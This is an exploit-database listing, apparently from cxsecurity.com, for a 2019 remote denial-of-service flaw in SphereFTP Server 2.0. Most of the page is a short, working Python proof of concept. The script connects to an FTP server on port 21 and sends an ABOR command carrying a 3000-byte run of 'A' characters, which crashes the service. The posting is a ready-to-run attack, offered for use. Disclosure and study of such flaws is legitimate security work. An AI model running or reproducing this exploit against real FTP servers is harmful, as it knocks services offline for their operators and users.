SphereFTP 2.0 Denial Of Service

2019.04.01
Credit: Sachin Wagh
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: SphereFTP Server v2.0 Remote Denial of Service Vulnerability # Date: 2019-31-03 # Exploit Author: Sachin Wagh (@tiger_tigerboy) # Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip # Tested on: Windows 10 64-bit import socket import sys evil = "A"*3000 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.56.1',21)) s.recv(1024) s.send('ABOR '+evil+'\r\n') s.recv(1024) s.close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top